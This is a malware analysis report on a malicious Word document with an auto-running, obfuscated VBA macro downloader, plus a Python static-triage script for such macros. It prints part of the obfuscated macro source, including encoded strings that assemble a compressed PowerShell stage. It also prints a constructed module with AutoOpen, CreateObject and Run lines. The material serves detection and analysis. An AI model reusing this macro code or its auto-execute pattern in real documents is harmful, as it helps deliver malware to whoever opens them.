Verdict: MALICIOUS
Risk Score: 224
Malware Insights
MITRE ATT&CK: T1059.005 Command and Scripting Interpreter: Visual Basic; T1140 Deobfuscate/Decode Files or Information
The sample is a malicious Office (OLE) document carrying VBA macros. An AutoOpen procedure is present, so the macro runs as soon as the document is opened, and the code calls CreateObject, which is how VBA instantiates COM objects such as WScript.Shell, XMLHTTP or ADODB.Stream to run or fetch something. Together with the extracted 'macros.bas' module and the ClamAV signature Doc.Malware.Emodldr-10025032-0, this points to a macro downloader. The VBA source is heavily obfuscated: dead Select Case blocks pad the code, and every meaningful string is passed through one decoder function (kFTrBu) with two numeric parameters whose body is not in the visible portion of the source. The preview therefore does not yield the download URL or the exact execution method, but cleartext fragments inside the encoded literals (System.IO.Compression, ::Decompress, ForEach-Object, New-Object IO.StreamReader) show that the decoded strings assemble a compressed, base64-like PowerShell stage that fetches and runs a secondary payload. Two caveats: the 'Legacy WordBasic auto-exec macro marker' heuristic reports that no modern VBA project was recovered, which conflicts with the extracted macros.bas and should be treated as redundant here; and the only embedded URL is an Office XML schema namespace, not a network indicator.
Heuristics (8)
- ClamAV: Doc.Malware.Emodldr-10025032-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0.
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]: Document contains VBA macro code.
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: AutoOpen macro present; the code runs automatically when the document is opened.
- CreateObject call [high, OLE_VBA_CREATEOBJ]: CreateObject call present (COM object instantiation, commonly used to reach WScript.Shell, XMLHTTP or ADODB.Stream from a macro).
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact [info, EXTRACTED_FILE_STATIC_TRIAGE]: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body); this is the DrawingML XML namespace, not a network indicator.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | Detection | Obfuscation or payload |
|---|---|---|---|---|---|
| macros.bas (SHA-256: ab8a136429fbec0dbfa2dee8add2dca68cae5bc0edca6a8b0827c9f648424d7a) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 49395 bytes | ClamAV: no threats found (the Emodldr signature fired on the parent document, not on the extracted source text) | likely: carved artifact contains 11 long base64-like blob(s) |
Preview script (first 1,000 lines of the extracted script):
```vb
Attribute VB_Name = "jpWQHEwkup"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "JwssZSKpKRRD"
Function bqLiQcBEz()
On Error Resume Next
Select Case hfOUj
Case 14791
iAaGd = 77435
JriNm = Sqr(47354)
Case 63755
tYpAX = CSng(NsilK)
RZnlJY = hbSbr
End Select
nvlLPXVR = kFTrBu("C9BRRrw2n/3sZOatuXWzsZl3xrnZd1O05p0zr8zbPsw3Bz3@", 6, 41)
Select Case MYwtC
Case 46624
jPmqf = 66771
LQHvUT = Sqr(23811)
Case 15173
EtDNMz = CSng(awwvLf)
zcNpv = nzGao
End Select
Select Case SofHpF
Case 93910
bUCOq = 16525
TLBrfa = Sqr(13200)
Case 95393
oJPiPc = CSng(ASBzh)
ENtzYY = kzidJ
End Select
KapEJN = kFTrBu("GIKW+hO7HfHZy6T6Y8s", 5, 10)
Select Case qEMaLL
Case 82746
TfpOow = 98127
woLHj = Sqr(13269)
Case 76991
hBiYzq = CSng(lYjmQo)
qlqlki = jjZZj
End Select
Select Case FRSsMP
Case 46391
FnuIqs = 95905
krqoFE = Sqr(79676)
Case 75599
wTWOZ = CSng(FIkrZ)
tkzmZ = EZKwvN
End Select
KXFozlXOu = kFTrBu("njLmzZuLH6N2Ub3Pl6vVt+ePd+2/D3e3q4dt5Uej53+MRpeTV9n1dZLcXF2Nwt/Vj9Evl6Nn7x7fLuzdh2Ty8dfw/+Zb+H+afvz14u+Lq/8A'), [sYStEM.iO.COmPREssIon.coMPreSTNTVrT", 2, 141)
Select Case iYSuj
Case 2700
fmOvBj = 60850
ozGBY = Sqr(4147)
Case 84178
sBjPl = CSng(uCXIF)
rnODpz = GVClsJ
End Select
Select Case vZcoFo
Case 29319
HUfXb = 24215
WmEtK = Sqr(52477)
Case 87437
zuvdu = CSng(YUmGKi)
ojuuK = cuThCW
End Select
GBvTUdAAkY = kFTrBu("b+Bju6oxzrqg9j/aP9y5HeXjH3HkX2V9osL5hd4j/UgOtGjn4l6D/XT0j+WeqKmXtPvAsBf9uUL6vOGfYLqDq2b8", 2, 82)
Select Case pshwz
Case 45517
TdtJK = 38958
iAtRR = Sqr(57740)
Case 10048
GKwApR = CSng(jNtHs)
fnqJn = zLmkkp
End Select
Select Case JwKvY
Case 1932
JNGjz = 87789
jipzSC = Sqr(20158)
Case 49734
Hbljw = CSng(WKsjG)
lMLjuc = FoEoaj
End Select
YUKiwpW = kFTrBu("vdhsioNmode]::deComPRESs )|&('F'+'oreacH-'+'OBjE'+'ct'){&('New-'+'oBJe'+'CT') ('IO.sT'+'reA'+'MrEAder')($_,[tEXt.enCBIj", 4, 114)
Select Case IuJWi
Case 5714
bDUnRQ = 74669
wnQmww = Sqr(42729)
Case 56351
YajUj = CSng(nKCqO)
AWBDwJ = rvcMn
End Select
Select Case utwEp
Case 86977
wPZGb = 3716
chJslH = Sqr(37047)
Case 71491
DfiVI = CSng(bIqsO)
sRsFG = FTvSDW
End Select
hwARRVS = kFTrBu("J7AtfKA3Mr5Rv5uwXu7hZzsdl/dhXaN+KMXfeh/1q5zn4O/Gy7oO54XxsN9O5lXqnxxxHO7Zir07jQPjvlb/12JPovfqEU/1T1gf1mmccM9a4oD5uq+VuG71PnKPueSf7J+Lv47II8ZN8krzRPyXyz6prNf9JU69jHuxdyfz1hy3nuskb4L9yI9W7Erj", 8, 179)
Select Case NpwNi
Case 20847
JhtZGX = 17368
nRPjnO = Sqr(68294)
Case 29606
mfPNS = CSng(kcMAu)
duMhc = LYTzi
End Select
Select Case nQizNP
Case 6138
QHmccZ = 66271
NiSjit = Sqr(13515)
Case 80146
QJjKX = CSng(NSnkp)
WwFDJz = QiGME
End Select
EpNBAG = kFTrBu("FWR4fRxwS3OF3Bc3LlrjhoJs0n4BnlcaJ+gb1npJXYx8TcWnM7yoH6pgj7UjIZPT,", 4, 59)
Select Case Azmzs
Case 88514
pmzFW = 60826
jYJoot = Sqr(10803)
Case 81991
McZtrY = CSng(JzbtXa)
Vvqjqj = AjdGjr
End Select
Select Case wodaT
Case 18781
BnmfU = 27
```
... (truncated)
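A practitioner looking at the preview above would want to perform the static triage the heuristics describe (an auto-exec token together with an execution token, repeated calls to one string-decoder function, long base64-like blobs) before spending time on the decoder itself. The following Python script is an added example, not part of the report or of oletools; it runs over a constructed VBA module modelled on the macros.bas preview. The Select Case padding and the kFTrBu literals are copied from the preview; the AutoOpen procedure and the CreateObject/.Run lines are assumed, because the report confirms both tokens but the preview is truncated before they appear. The body of kFTrBu is not on the page, so it is not reimplemented; instead the script strips the dead Select Case padding, identifies the decoder by call frequency, folds PowerShell 'a'+'b' string splicing inside the literals back together, and reports the cleartext PowerShell tokens that survive in them.

```python
"""Static triage of an olevba-extracted VBA module (added example, not report or oletools code)."""
import json
import re
from collections import Counter

# CONSTRUCTED sample modelled on the macros.bas preview. The Select Case padding and
# the kFTrBu("...", n, m) calls are copied from the preview; the AutoOpen sub and the
# CreateObject/.Run lines are ASSUMED (the report confirms both tokens, the preview is
# truncated before they appear).
SAMPLE_MODULE = r'''Attribute VB_Name = "JwssZSKpKRRD"
Sub AutoOpen()
bqLiQcBEz
End Sub
Function bqLiQcBEz()
On Error Resume Next
Select Case hfOUj
Case 14791
iAaGd = 77435
JriNm = Sqr(47354)
Case 63755
tYpAX = CSng(NsilK)
RZnlJY = hbSbr
End Select
nvlLPXVR = kFTrBu("C9BRRrw2n/3sZOatuXWzsZl3xrnZd1O05p0zr8zbPsw3Bz3@", 6, 41)
KapEJN = kFTrBu("GIKW+hO7HfHZy6T6Y8s", 5, 10)
Select Case MYwtC
Case 46624
jPmqf = 66771
End Select
KXFozlXOu = kFTrBu("njLmzZuLH6N2Ub3Pl6vVt+ePd+2/D3e3q4dt5Uej53+MRpeTV9n1dZLcXF2Nwt/Vj9Evl6Nn7x7fLuzdh2Ty8dfw/+Zb+H+afvz14u+Lq/8A'), [sYStEM.iO.COmPREssIon.coMPreSTNTVrT", 2, 141)
YUKiwpW = kFTrBu("vdhsioNmode]::deComPRESs )|&('F'+'oreacH-'+'OBjE'+'ct'){&('New-'+'oBJe'+'CT') ('IO.sT'+'reA'+'MrEAder')($_,[tEXt.enCBIj", 4, 114)
Set oGWAd = CreateObject(nvlLPXVR & KapEJN)
oGWAd.Run KXFozlXOu & YUKiwpW, 0
End Function
'''

AUTOEXEC = ("AutoOpen", "Auto_Open", "AutoExec", "AutoNew", "AutoClose",
            "Document_Open", "Document_Close", "Workbook_Open", "Workbook_Close")
EXEC_TOKENS = ("CreateObject", "GetObject", "Shell", "Run", "Exec", "powershell",
               "cmd.exe", "URLDownloadToFile", "XMLHTTP", "ADODB.Stream", "SaveToFile")
SELECT_BLOCK = re.compile(r"^[ \t]*Select Case \w+[ \t]*\n(.*?)^[ \t]*End Select[ \t]*\n", re.S | re.M)
PAD_LINE = re.compile(r"^\s*(?:Case \d+|\w+ = (?:\d+|Sqr\(\d+\)|CSng\(\w+\)|\w+))\s*$")
DECODER_CALL = re.compile(r'\b(\w+)\("([^"]*)",\s*(\d+),\s*(\d+)\)')   # f("literal", n, m)
CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")                    # 'a'+'b' splicing
PS_TOKENS = re.compile(r"(?i)\b(?:compression|decompress|streamreader|memorystream|"
                       r"foreach-object|new-object|invoke-expression|iex|"
                       r"frombase64string|downloadstring|downloadfile)\b")
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")                    # long base64-like run


def found_tokens(src, tokens):
    """Case-insensitive whole-token search; returns the canonical spellings found, in list order."""
    return [t for t in tokens if re.search(r"(?<!\w)" + re.escape(t) + r"(?!\w)", src, re.I)]


def strip_dead_selects(src):
    """Remove Select Case blocks whose every line is a constant/junk assignment (the padding)."""
    removed = 0

    def repl(m):
        nonlocal removed
        body = [ln for ln in m.group(1).splitlines() if ln.strip()]
        if body and all(PAD_LINE.match(ln) for ln in body):
            removed += 1
            return ""
        return m.group(0)           # keep blocks that contain anything non-trivial
    return SELECT_BLOCK.sub(repl, src), removed


def decoder_calls(src):
    """Collect f("literal", n, m) calls; the most frequent callee is the likely string decoder."""
    calls = DECODER_CALL.findall(src)
    if not calls:
        return None, []
    name = Counter(c[0] for c in calls).most_common(1)[0][0]
    return name, [(lit, int(a), int(b)) for fn, lit, a, b in calls if fn == name]


def collapse_concat(s):
    """Fold PowerShell 'a'+'b'+'c' string splicing back into 'abc' until nothing changes."""
    prev = None
    while prev != s:
        prev, s = s, CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", s)
    return s


def readable_fragments(literals):
    """Cleartext PowerShell tokens that survive inside the encoded literals (lowercased, sorted)."""
    found = set()
    for lit in literals:
        found.update(t.lower() for t in PS_TOKENS.findall(collapse_concat(lit)))
    return sorted(found)


def triage(src):
    """Summarise one extracted module the way the report's macro heuristics do."""
    cleaned, junk = strip_dead_selects(src)
    decoder, calls = decoder_calls(cleaned)
    autoexec = found_tokens(cleaned, AUTOEXEC)
    execs = found_tokens(cleaned, EXEC_TOKENS)
    return {
        "autoexec": autoexec,
        "exec_tokens": execs,
        "dead_select_blocks": junk,
        "decoder": decoder,
        "decoder_calls": len(calls),
        "fragments": readable_fragments(lit for lit, _, _ in calls),
        "b64_blobs": len(B64_BLOB.findall(cleaned)),
        "suspicious": bool(autoexec and execs),   # the OLE_VBA_PCODE_AUTOEXEC_EXEC condition
    }


if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_MODULE), indent=2))
```

Run it as a script to print the triage as JSON; on real olevba output, pass the module text to triage(). On this sample the fragments it recovers (compression, decompress, foreach-object, new-object, streamreader) are what justify reading the second stage as a compressed PowerShell command, without having to reverse the decoder first.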